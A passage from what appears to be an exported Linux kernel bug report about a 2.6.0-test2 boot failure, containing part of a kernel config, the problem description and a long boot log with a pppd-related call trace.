CONFIG_CRYPTO_SERPENT=y CONFIG_CRYPTO_AES=y CONFIG_CRYPTO_DEFLATE=y # CONFIG_CRYPTO_TEST is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_X86_BIOS_REBOOT=y</t>
  </si>
  <si>
    <t>Boot blocked on  2.6.0-test2</t>
  </si>
  <si>
    <t>2003-07-30 19:44 UTC</t>
  </si>
  <si>
    <t>Nelson Ferreira</t>
  </si>
  <si>
    <t>2004-12-02 12:33 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 6.1 heavilly updated Hardware Environment: Dual PIII 450Mhz SMP 440BX motherboard Software Environment: Problem Description: I took 2.6.0-test2 for a spin (compiled even with 2.93.5) and could not complete the boot because it seems that pppd-2.4.0 is having a bad interaction with the kernel. On the other hand, the matroxfb is not using the mode I specify on the boot args (very minor :) ) and the aic78xx driver is not being able to configure the DV and asks me to file a bug report on that. Following are the boot log and .config. --- boot.log --- Jul 28 01:07:37 tuxie syslogd 1.3-3: restart. Jul 28 01:07:37 tuxie syslog: syslogd startup succeeded Jul 28 01:07:37 tuxie kernel: klogd 1.3-3, log source = /proc/kmsg started. Jul 28 01:07:37 tuxie kernel: Inspecting /boot/System.map-2.6.0-test2 Jul 28 01:07:37 tuxie syslog: klogd startup succeeded Jul 28 01:07:37 tuxie identd: identd startup succeeded Jul 28 01:07:38 tuxie atd: atd startup succeeded Jul 28 01:07:38 tuxie kernel: Loaded 31613 symbols from /boot/System.map-2.6.0-test2. Jul 28 01:07:38 tuxie kernel: Symbols match kernel version 2.6.0. Jul 28 01:07:38 tuxie kernel: No module symbols loaded - kernel modules not enabled. Jul 28 01:07:38 tuxie kernel: Linux version 2.6.0-test2 (root@tuxie.homelinux.net) (gcc version 2.95.3 20010315 (release)) #6 SMP Sun Jul 27 22:58:58 EDT 2003 Jul 28 01:07:38 tuxie kernel: Video mode to be used for restore is f07 Jul 28 01:07:38 tuxie kernel: BIOS-provided physical RAM map: Jul 28 01:07:38 tuxie kernel: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) Jul 28 01:07:38 tuxie kernel: BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) Jul 28 01:07:38 tuxie kernel: BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) Jul 28 01:07:38 tuxie kernel: BIOS-e820: 0000000000100000 - 0000000000f00000 (usable) Jul 28 01:07:38 tuxie kernel: BIOS-e820: 0000000000f00000 - 0000000001000000 (reserved) Jul 28 01:07:38 tuxie kernel: BIOS-e820: 0000000001000000 - 0000000040000000 (usable) Jul 28 01:07:38 tuxie kernel: BIOS-e820: 00000000fec00000 - 00000000fec01000 (reserved) Jul 28 01:07:38 tuxie kernel: BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) Jul 28 01:07:38 tuxie kernel: BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) Jul 28 01:07:38 tuxie kernel: 128MB HIGHMEM available. Jul 28 01:07:38 tuxie kernel: 896MB LOWMEM available. Jul 28 01:07:38 tuxie kernel: found SMP MP-table at 000f5810 Jul 28 01:07:38 tuxie kernel: hm, page 000f5000 reserved twice. Jul 28 01:07:38 tuxie kernel: hm, page 000f6000 reserved twice. Jul 28 01:07:38 tuxie kernel: hm, page 000f1000 reserved twice. Jul 28 01:07:38 tuxie kernel: hm, page 000f2000 reserved twice. Jul 28 01:07:38 tuxie kernel: On node 0 totalpages: 262144 Jul 28 01:07:38 tuxie kernel: DMA zone: 4096 pages, LIFO batch:1 Jul 28 01:07:38 tuxie crond: crond startup succeeded Jul 28 01:07:38 tuxie kernel: Normal zone: 225280 pages, LIFO batch:16 Jul 28 01:07:38 tuxie kernel: HighMem zone: 32768 pages, LIFO batch:8 Jul 28 01:07:38 tuxie kernel: Intel MultiProcessor Specification v1.1 Jul 28 01:07:39 tuxie inet: inetd startup succeeded Jul 28 01:07:39 tuxie inetd[492]: auth/tcp: bind: Address already in use Jul 28 01:07:39 tuxie kernel: Virtual Wire compatibility mode. Jul 28 01:07:39 tuxie keytable: Loading keymap: Jul 28 01:07:39 tuxie inetd[492]: pmap_set: 391002 1 6 32768: Address already in use Jul 28 01:07:39 tuxie kernel: OEM ID: OEM00000 Product ID: PROD00000000 APIC at: 0xFEE00000 Jul 28 01:07:39 tuxie keytable: Loading system font: Jul 28 01:07:39 tuxie inetd[492]: pmap_set: 391002 2 6 32768: Address already in use Jul 28 01:07:39 tuxie kernel: Processor #0 6:7 APIC version 17 Jul 28 01:07:39 tuxie keytable: Loading /usr/lib/kbd/keymaps/i386/qwerty/us-acentos.map.gz Jul 28 01:07:39 tuxie kernel: Processor #1 6:7 APIC version 17 Jul 28 01:07:39 tuxie rc: Starting keytable succeeded Jul 28 01:07:39 tuxie kernel: I/O APIC #2 Version 17 at 0xFEC00000. Jul 28 01:07:39 tuxie kernel: Enabling APIC mode: Flat. Using 1 I/O APICs Jul 28 01:07:39 tuxie kernel: Processors: 2 Jul 28 01:07:39 tuxie adsl: Bringing up ADSL link Jul 28 01:07:39 tuxie kernel: Building zonelist for node : 0 Jul 28 01:07:40 tuxie kernel: Kernel command line: BOOT_IMAGE=LI ro root=81b video=matrox:vesa:0x11E apm=off acpi=off ide2=ata66 hdc=cdrom Jul 28 01:07:40 tuxie adsl: . Jul 28 01:07:40 tuxie kernel: ide_setup: ide2=ata66 Jul 28 01:07:40 tuxie kernel: ide_setup: hdc=cdrom Jul 28 01:07:40 tuxie kernel: Initializing CPU#0 Jul 28 01:07:40 tuxie kernel: PID hash table entries: 4096 (order 12: 32768 bytes) Jul 28 01:07:40 tuxie kernel: Detected 463.956 MHz processor. Jul 28 01:07:40 tuxie kernel: Console: colour VGA+ 80x60 Jul 28 01:07:40 tuxie kernel: Calibrating delay loop... 915.45 BogoMIPS Jul 28 01:07:40 tuxie kernel: Memory: 1032032k/1048576k available (2368k kernel code, 14560k reserved, 1228k data, 208k init, 131072k highmem) Jul 28 01:07:40 tuxie kernel: Security Scaffold v1.0.0 initialized Jul 28 01:07:40 tuxie kernel: Capability LSM initialized Jul 28 01:07:40 tuxie kernel: Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Jul 28 01:07:40 tuxie kernel: Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Jul 28 01:07:40 tuxie kernel: Mount-cache hash table entries: 512 (order: 0, 4096 bytes) Jul 28 01:07:40 tuxie kernel: -&gt; /dev Jul 28 01:07:40 tuxie kernel: -&gt; /dev/console Jul 28 01:07:40 tuxie kernel: -&gt; /root Jul 28 01:07:41 tuxie kernel: CPU: L1 I cache: 16K, L1 D cache: 16K Jul 28 01:07:41 tuxie kernel: CPU: L2 cache: 512K Jul 28 01:07:41 tuxie pppd[643]: pppd 2.4.0 started by root, uid 0 Jul 28 01:07:41 tuxie kernel: Intel machine check architecture supported. Jul 28 01:07:41 tuxie pppd[643]: Using interface ppp0 Jul 28 01:07:41 tuxie pppoe[746]: ioctl(SIOCGIFHWADDR): No such device Jul 28 01:07:41 tuxie kernel: Intel machine check reporting enabled on CPU#0. Jul 28 01:07:41 tuxie kernel: Enabling fast FPU save and restore... done. Jul 28 01:07:41 tuxie pppd[643]: Connect: ppp0 &lt;--&gt; /dev/pts/0 Jul 28 01:07:41 tuxie kernel: Enabling unmasked SIMD FPU exception support... done. Jul 28 01:07:41 tuxie pppd[643]: ioctl(PPPIOCSASYNCMAP): Inappropriate ioctl for device(25) Jul 28 01:07:41 tuxie kernel: Checking 'hlt' instruction... OK. Jul 28 01:07:41 tuxie pppd[643]: tcflush failed: Input/output error Jul 28 01:07:41 tuxie kernel: POSIX conformance testing by UNIFIX Jul 28 01:07:41 tuxie pppd[643]: Exit. Jul 28 01:07:41 tuxie kernel: CPU0: Intel Pentium III (Katmai) stepping 03 Jul 28 01:07:41 tuxie kernel: per-CPU timeslice cutoff: 1465.61 usecs. Jul 28 01:07:41 tuxie kernel: task migration cache decay timeout: 2 msecs. Jul 28 01:07:41 tuxie kernel: enabled ExtINT on CPU#0 Jul 28 01:07:41 tuxie kernel: ESR value before enabling vector: 00000000 Jul 28 01:07:41 tuxie kernel: ESR value after enabling vector: 00000000 Jul 28 01:07:41 tuxie kernel: Booting processor 1/1 eip 3000 Jul 28 01:07:41 tuxie kernel: Initializing CPU#1 Jul 28 01:07:42 tuxie kernel: masked ExtINT on CPU#1 Jul 28 01:07:42 tuxie kernel: ESR value before enabling vector: 00000000 Jul 28 01:07:42 tuxie kernel: ESR value after enabling vector: 00000000 Jul 28 01:07:42 tuxie kernel: Calibrating delay loop... 925.69 BogoMIPS Jul 28 01:07:42 tuxie kernel: CPU: L1 I cache: 16K, L1 D cache: 16K Jul 28 01:07:42 tuxie kernel: CPU: L2 cache: 512K Jul 28 01:07:42 tuxie kernel: Intel machine check architecture supported. Jul 28 01:07:42 tuxie adsl: . Jul 28 01:07:42 tuxie kernel: Intel machine check reporting enabled on CPU#1. Jul 28 01:07:42 tuxie kernel: CPU1: Intel Pentium III (Katmai) stepping 03 Jul 28 01:07:42 tuxie kernel: Total of 2 processors activated (1841.15 BogoMIPS). Jul 28 01:07:42 tuxie kernel: ENABLING IO-APIC IRQs Jul 28 01:07:42 tuxie kernel: Setting 2 in the phys_id_present_map Jul 28 01:07:42 tuxie kernel: ...changing IO-APIC physical APIC ID to 2 ... ok. Jul 28 01:07:42 tuxie kernel: ..TIMER: vector=0x31 pin1=2 pin2=0 Jul 28 01:07:42 tuxie kernel: testing the IO APIC....................... Jul 28 01:07:43 tuxie kernel: .................................... done. Jul 28 01:07:43 tuxie kernel: Using local APIC timer interrupts. Jul 28 01:07:43 tuxie kernel: calibrating APIC timer ... Jul 28 01:07:43 tuxie kernel: ..... CPU clock speed is 463.0845 MHz. Jul 28 01:07:43 tuxie kernel: ..... host bus clock speed is 103.0076 MHz. Jul 28 01:07:43 tuxie kernel: checking TSC synchronization across 2 CPUs: passed. Jul 28 01:07:43 tuxie kernel: Starting migration thread for cpu 0 Jul 28 01:07:43 tuxie kernel: Bringing up 1 Jul 28 01:07:43 tuxie kernel: CPU 1 IS NOW UP! Jul 28 01:07:43 tuxie kernel: Starting migration thread for cpu 1 Jul 28 01:07:43 tuxie kernel: CPUS done 2 Jul 28 01:07:43 tuxie kernel: Initializing RT netlink socket Jul 28 01:07:43 tuxie kernel: PCI: PCI BIOS revision 2.10 entry at 0xfb3c0, last bus=1 Jul 28 01:07:43 tuxie kernel: PCI: Using configuration type 1 Jul 28 01:07:43 tuxie kernel: mtrr: v2.0 (20020519) Jul 28 01:07:43 tuxie kernel: mtrr: your CPUs had inconsistent fixed MTRR settings Jul 28 01:07:43 tuxie kernel: mtrr: your CPUs had inconsistent variable MTRR settings Jul 28 01:07:43 tuxie kernel: mtrr: probably your BIOS does not setup all CPUs. Jul 28 01:07:43 tuxie kernel: mtrr: corrected configuration. Jul 28 01:07:43 tuxie kernel: BIO: pool of 256 setup, 15Kb (60 bytes/bio) Jul 28 01:07:43 tuxie kernel: biovec pool[0]: 1 bvecs: 256 entries (12 bytes) Jul 28 01:07:43 tuxie kernel: biovec pool[1]: 4 bvecs: 256 entries (48 bytes) Jul 28 01:07:44 tuxie kernel: biovec pool[2]: 16 bvecs: 256 entries (192 bytes) Jul 28 01:07:44 tuxie kernel: biovec pool[3]: 64 bvecs: 256 entries (768 bytes) Jul 28 01:07:44 tuxie kernel: biovec pool[4]: 128 bvecs: 256 entries (1536 bytes) Jul 28 01:07:44 tuxie kernel: biovec pool[5]: 256 bvecs: 256 entries (3072 bytes) Jul 28 01:07:44 tuxie kernel: ACPI: Subsystem revision 20030714 Jul 28 01:07:44 tuxie kernel: ACPI: Disabled via command line (acpi=off) Jul 28 01:07:44 tuxie kernel: Linux Plug and Play Support v0.96 (c) Adam Belay Jul 28 01:07:44 tuxie kernel: PnPBIOS: Scanning system for PnP BIOS support... Jul 28 01:07:44 tuxie kernel: PnPBIOS: Found PnP BIOS installation structure at 0xc00fbff0 Jul 28 01:07:44 tuxie kernel: PnPBIOS: PnP BIOS version 1.0, entry 0xf0000:0xc018, dseg 0xf0000 Jul 28 01:07:44 tuxie kernel: PnPBIOS: 15 nodes reported by PnP BIOS; 15 recorded by driver Jul 28 01:07:44 tuxie kernel: SCSI subsystem initialized Jul 28 01:07:44 tuxie adsl: . Jul 28 01:07:44 tuxie kernel: drivers/usb/core/usb.c: registered new driver usbfs Jul 28 01:07:44 tuxie kernel: drivers/usb/core/usb.c: registered new driver hub Jul 28 01:07:44 tuxie kernel: ACPI: ACPI tables contain no PCI IRQ routing entries Jul 28 01:07:44 tuxie kernel: PCI: Invalid ACPI-PCI IRQ routing table Jul 28 01:07:44 tuxie kernel: PCI: Probing PCI hardware Jul 28 01:07:44 tuxie kernel: PCI: Probing PCI hardware (bus 00) Jul 28 01:07:44 tuxie kernel: PCI: Using IRQ router PIIX [8086/7110] at 0000:00:07.0 Jul 28 01:07:44 tuxie kernel: PCI-&gt;APIC IRQ transform: (B0,I7,P3) -&gt; 19 Jul 28 01:07:44 tuxie kernel: PCI-&gt;APIC IRQ transform: (B0,I8,P0) -&gt; 17 Jul 28 01:07:44 tuxie kernel: PCI-&gt;APIC IRQ transform: (B0,I8,P0) -&gt; 17 Jul 28 01:07:44 tuxie kernel: PCI-&gt;APIC IRQ transform: (B0,I9,P0) -&gt; 19 Jul 28 01:07:44 tuxie kernel: PCI-&gt;APIC IRQ transform: (B0,I10,P0) -&gt; 18 Jul 28 01:07:44 tuxie kernel: PCI-&gt;APIC IRQ transform: (B0,I11,P0) -&gt; 17 Jul 28 01:07:44 tuxie kernel: PCI-&gt;APIC IRQ transform: (B0,I12,P0) -&gt; 16 Jul 28 01:07:44 tuxie kernel: PCI: No IRQ known for interrupt pin A of device 0000:01:00.0. Probably buggy MP table. Jul 28 01:07:44 tuxie kernel: matroxfb: Matrox Marvel G200 (AGP) detected Jul 28 01:07:44 tuxie kernel: matroxfb: MTRR's turned on Jul 28 01:07:44 tuxie kernel: matroxfb: 640x480x8bpp (virtual: 640x65536) Jul 28 01:07:44 tuxie kernel: matroxfb: framebuffer at 0xEC000000, mapped to 0xf8805000, size 8388608 Jul 28 01:07:44 tuxie kernel: fb0: MATROX frame buffer device Jul 28 01:07:44 tuxie kernel: fb0: initializing hardware Jul 28 01:07:44 tuxie kernel: Console: switching to colour frame buffer device 80x30 Jul 28 01:07:44 tuxie kernel: pty: 256 Unix98 ptys configured Jul 28 01:07:45 tuxie kernel: IA-32 Microcode Update Driver: v1.11 &lt;tigran@veritas.com&gt; Jul 28 01:07:45 tuxie kernel: apm: BIOS version 1.2 Flags 0x07 (Driver version 1.16ac) Jul 28 01:07:45 tuxie kernel: apm: disabled on user request. Jul 28 01:07:45 tuxie kernel: Starting balanced_irq Jul 28 01:07:45 tuxie kernel: Enabling SEP on CPU 1 Jul 28 01:07:45 tuxie kernel: Enabling SEP on CPU 0 Jul 28 01:07:45 tuxie kernel: Total HugeTLB memory allocated, 0 Jul 28 01:07:45 tuxie kernel: highmem bounce pool size: 64 pages Jul 28 01:07:45 tuxie kernel: VFS: Disk quotas dquot_6.5.1 Jul 28 01:07:45 tuxie kernel: Journalled Block Device driver loaded Jul 28 01:07:45 tuxie kernel: devfs: v1.22 (20021013) Richard Gooch (rgooch@atnf.csiro.au) Jul 28 01:07:45 tuxie kernel: devfs: boot_options: 0x0 Jul 28 01:07:45 tuxie kernel: Initializing Cryptographic API Jul 28 01:07:45 tuxie kernel: Limiting direct PCI/PCI transfers. Jul 28 01:07:45 tuxie kernel: isapnp: Scanning for PnP cards... Jul 28 01:07:45 tuxie kernel: isapnp: No Plug &amp; Play device found Jul 28 01:07:45 tuxie kernel: Real Time Clock Driver v1.11 Jul 28 01:07:45 tuxie kernel: Non-volatile memory driver v1.2 Jul 28 01:07:45 tuxie kernel: Linux agpgart interface v0.100 (c) Dave Jones Jul 28 01:07:45 tuxie kernel: agpgart: Detected an Intel 440BX Chipset. Jul 28 01:07:45 tuxie kernel: agpgart: Maximum main memory to use for agp memory: 942M Jul 28 01:07:45 tuxie kernel: agpgart: AGP aperture is 128M @ 0xe0000000 Jul 28 01:07:45 tuxie kernel: [drm] Initialized mga 3.1.0 20021029 on minor 0 Jul 28 01:07:45 tuxie kernel: parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE,EPP] Jul 28 01:07:45 tuxie kernel: parport0: irq 7 detected Jul 28 01:07:45 tuxie kernel: parport0: Printer, Lexmark Lexmark Z53 Jul 28 01:07:45 tuxie kernel: Using anticipatory scheduling elevator Jul 28 01:07:45 tuxie kernel: Floppy drive(s): fd0 is 1.44M Jul 28 01:07:45 tuxie kernel: FDC 0 is a post-1991 82077 Jul 28 01:07:45 tuxie kernel: PPP generic driver version 2.4.2 Jul 28 01:07:45 tuxie kernel: PPP Deflate Compression module registered Jul 28 01:07:45 tuxie kernel: PPP BSD Compression module registered Jul 28 01:07:45 tuxie kernel: Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 Jul 28 01:07:45 tuxie kernel: ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx Jul 28 01:07:45 tuxie kernel: PIIX4: IDE controller at PCI slot 0000:00:07.1 Jul 28 01:07:46 tuxie kernel: PIIX4: chipset revision 1 Jul 28 01:07:46 tuxie kernel: PIIX4: not 100%% native mode: will probe irqs later Jul 28 01:07:46 tuxie kernel: ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:DMA, hdb:pio Jul 28 01:07:46 tuxie kernel: ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:DMA, hdd:pio Jul 28 01:07:46 tuxie kernel: hda: Maxtor 90845D4, ATA DISK drive Jul 28 01:07:46 tuxie kernel: ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Jul 28 01:07:46 tuxie kernel: hdc: SAMSUNG SC-140B, ATAPI CD/DVD-ROM drive Jul 28 01:07:46 tuxie kernel: ide1 at 0x170-0x177,0x376 on irq 15 Jul 28 01:07:46 tuxie kernel: PDC20269: IDE controller at PCI slot 0000:00:0b.0 Jul 28 01:07:46 tuxie kernel: PDC20269: chipset revision 2 Jul 28 01:07:46 tuxie adsl: . Jul 28 01:07:46 tuxie kernel: PDC20269: ROM enabled at 0xee000000 Jul 28 01:07:46 tuxie kernel: PDC20269: 100%% native mode on irq 17 Jul 28 01:07:46 tuxie kernel: ide2: BM-DMA at 0xbc00-0xbc07, BIOS settings: hde:pio, hdf:pio Jul 28 01:07:46 tuxie kernel: ide3: BM-DMA at 0xbc08-0xbc0f, BIOS settings: hdg:pio, hdh:pio Jul 28 01:07:46 tuxie kernel: hde: Maxtor 4G160J8, ATA DISK drive Jul 28 01:07:46 tuxie kernel: ide2 at 0xac00-0xac07,0xb002 on irq 17 Jul 28 01:07:46 tuxie kernel: hda: max request size: 128KiB Jul 28 01:07:46 tuxie kernel: hda: host protected area =&gt; 1 Jul 28 01:07:46 tuxie kernel: hda: 16514064 sectors (8455 MB) w/512KiB Cache, CHS=16383/16/63, UDMA(33) Jul 28 01:07:46 tuxie kernel: /dev/ide/host0/bus0/target0/lun0: p1 p2 &lt; p5 &gt; Jul 28 01:07:46 tuxie kernel: hde: max request size: 1024KiB Jul 28 01:07:46 tuxie kernel: hde: host protected area =&gt; 1 Jul 28 01:07:46 tuxie kernel: hde: 320173056 sectors (163929 MB) w/2048KiB Cache, CHS=19929/255/63, UDMA(133) Jul 28 01:07:46 tuxie kernel: /dev/ide/host2/bus0/target0/lun0: p1 &lt; p5 p6 p7 p8 &gt; Jul 28 01:07:46 tuxie kernel: end_request: I/O error, dev hdc, sector 0 Jul 28 01:07:46 tuxie kernel: hdc: ATAPI 40X CD-ROM drive, 128kB Cache, DMA Jul 28 01:07:46 tuxie kernel: Uniform CD-ROM driver Revision: 3.12 Jul 28 01:07:47 tuxie kernel: scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.35 Jul 28 01:07:47 tuxie kernel: &lt;Adaptec 2940 Ultra2 SCSI adapter&gt; Jul 28 01:07:47 tuxie kernel: aic7890/91: Ultra2 Wide Channel A, SCSI Id=7, 32/253 SCBs Jul 28 01:07:47 tuxie kernel: Jul 28 01:07:47 tuxie kernel: (scsi0:A:2): 10.000MB/s transfers (10.000MHz, offset 8) Jul 28 01:07:47 tuxie kernel: scsi0:A:4:0: DV failed to configure device. Please file a bug report against this driver. Jul 28 01:07:47 tuxie kernel: (scsi0:A:12): 80.000MB/s transfers (40.000MHz, offset 31, 16bit) Jul 28 01:07:47 tuxie kernel: Vendor: PLEXTOR Model: CD-R PX-W4220T Rev: 1.04 Jul 28 01:07:47 tuxie kernel: Type: CD-ROM ANSI SCSI revision: 02 Jul 28 01:07:47 tuxie kernel: (scsi0:A:4): 20.000MB/s transfers (20.000MHz, offset 15) Jul 28 01:07:47 tuxie kernel: Vendor: QUANTUM Model: FIREBALL ST4.3S Rev: 0F0C Jul 28 01:07:47 tuxie kernel: Type: Direct-Access ANSI SCSI revision: 02 Jul 28 01:07:47 tuxie kernel: scsi0:A:4:0: Tagged Queuing enabled. Depth 32 Jul 28 01:07:47 tuxie kernel: Vendor: IBM Model: DNES-309170W Rev: SA30 Jul 28 01:07:47 tuxie kernel: Type: Direct-Access ANSI SCSI revision: 03 Jul 28 01:07:47 tuxie kernel: scsi0:A:12:0: Tagged Queuing enabled. Depth 32 Jul 28 01:07:47 tuxie kernel: SCSI device sda: 8519216 512-byte hdwr sectors (4362 MB) Jul 28 01:07:47 tuxie kernel: SCSI device sda: drive cache: write back Jul 28 01:07:47 tuxie kernel: /dev/scsi/host0/bus0/target4/lun0: p1 &lt; p5 &gt; Jul 28 01:07:47 tuxie kernel: Attached scsi disk sda at scsi0, channel 0, id 4, lun 0 Jul 28 01:07:47 tuxie kernel: SCSI device sdb: 17916240 512-byte hdwr sectors (9173 MB) Jul 28 01:07:47 tuxie kernel: SCSI device sdb: drive cache: write back Jul 28 01:07:47 tuxie kernel: /dev/scsi/host0/bus0/target12/lun0: p1 p2 p3 &lt; p5 p6 p7 p8 p9 p10 p11 p12 p13 p14 &gt; Jul 28 01:07:47 tuxie kernel: Attached scsi disk sdb at scsi0, channel 0, id 12, lun 0 Jul 28 01:07:47 tuxie kernel: sr0: scsi3-mmc drive: 20x/20x writer cd/rw xa/form2 cdda tray Jul 28 01:07:47 tuxie kernel: Attached scsi generic sg0 at scsi0, channel 0, id 2, lun 0, type 5 Jul 28 01:07:47 tuxie kernel: Attached scsi generic sg1 at scsi0, channel 0, id 4, lun 0, type 0 Jul 28 01:07:47 tuxie kernel: Attached scsi generic sg2 at scsi0, channel 0, id 12, lun 0, type 0 Jul 28 01:07:47 tuxie kernel: Console: switching to colour frame buffer device 80x30 Jul 28 01:07:47 tuxie kernel: mice: PS/2 mouse device common for all mice Jul 28 01:07:47 tuxie kernel: input: ImPS/2 Generic Wheel Mouse on isa0060/serio1 Jul 28 01:07:47 tuxie kernel: serio: i8042 AUX port at 0x60,0x64 irq 12 Jul 28 01:07:47 tuxie kernel: input: AT Set 2 keyboard on isa0060/serio0 Jul 28 01:07:47 tuxie kernel: serio: i8042 KBD port at 0x60,0x64 irq 1 Jul 28 01:07:47 tuxie kernel: i2c /dev entries driver module version 2.7.0 (20021208) Jul 28 01:07:48 tuxie kernel: i2c-elv.o: i2c ELV parallel port adapter module version 2.7.0 (20021208) Jul 28 01:07:48 tuxie kernel: NET4: Linux TCP/IP 1.0 for NET4.0 Jul 28 01:07:48 tuxie kernel: IP: routing cache hash table of 8192 buckets, 64Kbytes Jul 28 01:07:48 tuxie kernel: TCP: Hash tables configured (established 262144 bind 65536) Jul 28 01:07:48 tuxie kernel: Linux IP multicast router 0.06 plus PIM-SM Jul 28 01:07:48 tuxie kernel: NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. Jul 28 01:07:48 tuxie kernel: BIOS EDD facility v0.09 2003-Jan-22, 4 devices found Jul 28 01:07:48 tuxie kernel: Software Suspend has malfunctioning SMP support. Disabled :( Jul 28 01:07:48 tuxie kernel: VFS: Mounted root (ext2 filesystem) readonly. Jul 28 01:07:48 tuxie kernel: Freeing unused kernel memory: 208k freed Jul 28 01:07:48 tuxie kernel: Adding 1049576k swap on /dev/sdb6. Priority:-1 extents:1 Jul 28 01:07:48 tuxie kernel: es1371: version v0.32 time 22:34:54 Jul 27 2003 Jul 28 01:07:48 tuxie kernel: es1371: found chip, vendor id 0x1274 device id 0x1371 revision 0x06 Jul 28 01:07:48 tuxie kernel: es1371: found es1371 rev 6 at io 0xa400 irq 19 joystick 0x0 Jul 28 01:07:48 tuxie kernel: ac97_codec: AC97 codec, id: TRA35 (TriTech TR A5) Jul 28 01:07:48 tuxie kernel: MIDI Loopback device driver Jul 28 01:07:48 tuxie kernel: lp0: using parport0 (polling). Jul 28 01:07:48 tuxie adsl: . Jul 28 01:07:48 tuxie kernel: lp0: console ready Jul 28 01:07:48 tuxie kernel: drivers/usb/core/usb.c: registered new driver usbscanner Jul 28 01:07:48 tuxie kernel: drivers/usb/image/scanner.c: 0.4.14:USB Scanner Driver Jul 28 01:07:48 tuxie kernel: kjournald starting. Commit interval 5 seconds Jul 28 01:07:48 tuxie kernel: EXT3 FS on sdb9, internal journal Jul 28 01:07:48 tuxie kernel: EXT3-fs: mounted filesystem with ordered data mode. Jul 28 01:07:48 tuxie kernel: kjournald starting. Commit interval 5 seconds Jul 28 01:07:48 tuxie kernel: EXT3 FS on sdb14, internal journal Jul 28 01:07:48 tuxie kernel: EXT3-fs: mounted filesystem with ordered data mode. Jul 28 01:07:48 tuxie kernel: kjournald starting. Commit interval 5 seconds Jul 28 01:07:48 tuxie kernel: EXT3 FS on hde6, internal journal Jul 28 01:07:48 tuxie kernel: EXT3-fs: mounted filesystem with ordered data mode. Jul 28 01:07:48 tuxie kernel: kjournald starting. Commit interval 5 seconds Jul 28 01:07:48 tuxie kernel: EXT3 FS on hde8, internal journal Jul 28 01:07:48 tuxie kernel: EXT3-fs: mounted filesystem with ordered data mode. Jul 28 01:07:48 tuxie kernel: kjournald starting. Commit interval 5 seconds Jul 28 01:07:48 tuxie kernel: EXT3 FS on sda5, internal journal Jul 28 01:07:48 tuxie kernel: EXT3-fs: mounted filesystem with ordered data mode. Jul 28 01:07:49 tuxie kernel: kjournald starting. Commit interval 5 seconds Jul 28 01:07:49 tuxie kernel: EXT3 FS on sdb5, internal journal Jul 28 01:07:49 tuxie kernel: EXT3-fs: mounted filesystem with ordered data mode. Jul 28 01:07:49 tuxie kernel: kjournald starting. Commit interval 5 seconds Jul 28 01:07:49 tuxie kernel: EXT3 FS on sdb13, internal journal Jul 28 01:07:49 tuxie kernel: EXT3-fs: mounted filesystem with ordered data mode. Jul 28 01:07:49 tuxie kernel: ip_tables: (C) 2000-2002 Netfilter core team Jul 28 01:07:49 tuxie kernel: ip_conntrack version 2.1 (8192 buckets, 65536 max) - 304 bytes per conntrack Jul 28 01:07:49 tuxie kernel: Badness in local_bh_enable at kernel/softirq.c:113 Jul 28 01:07:49 tuxie kernel: Call Trace: Jul 28 01:07:49 tuxie kernel: [local_bh_enable+53/108] local_bh_enable+0x35/0x6c Jul 28 01:07:49 tuxie kernel: [ppp_async_push+400/412] ppp_async_push+0x190/0x19c Jul 28 01:07:49 tuxie kernel: [ppp_asynctty_wakeup+40/76] ppp_asynctty_wakeup+0x28/0x4c Jul 28 01:07:49 tuxie kernel: [pty_unthrottle+35/72] pty_unthrottle+0x23/0x48 Jul 28 01:07:49 tuxie kernel: [check_unthrottle+50/56] check_unthrottle+0x32/0x38 Jul 28 01:07:49 tuxie kernel: [reset_buffer_flags+136/144] reset_buffer_flags+0x88/0x90 Jul 28 01:07:49 tuxie kernel: [n_tty_flush_buffer+11/64] n_tty_flush_buffer+0xb/0x40 Jul 28 01:07:50 tuxie kernel: [pty_flush_buffer+26/72] pty_flush_buffer+0x1a/0x48 Jul 28 01:07:50 tuxie kernel: [do_tty_hangup+425/1040] do_tty_hangup+0x1a9/0x410 Jul 28 01:07:50 tuxie kernel: [tty_vhangup+10/16] tty_vhangup+0xa/0x10 Jul 28 01:07:50 tuxie kernel: [pty_close+255/260] pty_close+0xff/0x104 Jul 28 01:07:50 tuxie kernel: [release_dev+506/1496] release_dev+0x1fa/0x5d8 Jul 28 01:07:50 tuxie kernel: [schedule+1030/1264] schedule+0x406/0x4f0 Jul 28 01:07:50 tuxie kernel: [tty_release+70/136] tty_release+0x46/0x88 Jul 28 01:07:50 tuxie kernel: [__fput+66/268] __fput+0x42/0x10c Jul 28 01:07:50 tuxie kernel: [fput+20/24] fput+0x14/0x18 Jul 28 01:07:50 tuxie kernel: [filp_close+80/92] filp_close+0x50/0x5c Jul 28 01:07:50 tuxie kernel: [put_files_struct+84/188] put_files_struct+0x54/0xbc Jul 28 01:07:50 tuxie adsl: . Jul 28 01:07:50 tuxie kernel: [do_exit+523/1084] do_exit+0x20b/0x43c Jul 28 01:07:50 tuxie kernel: [sys_exit_group+0/20] sys_exit_group+0x0/0x14 Jul 28 01:07:50 tuxie kernel: [sys_exit_group+14/20] sys_exit_group+0xe/0x14 Jul 28 01:07:50 tuxie kernel: [syscall_call+7/11] syscall_call+0x7/0xb Jul 28 01:07:50 tuxie kernel: Jul 28 01:07:52 tuxie adsl: . Jul 28 01:08:08 tuxie last message repeated 8 times Jul 28 01:08:10 tuxie init: Switching to runlevel: 6 Jul 28 01:08:11 tuxie rc: Stopping keytable succeeded Jul 28 01:08:12 tuxie gpm: gpm shutdown succeeded Jul 28 01:08:12 tuxie inet: inetd shutdown succeeded Jul 28 01:08:12 tuxie atd: atd shutdown succeeded Jul 28 01:08:12 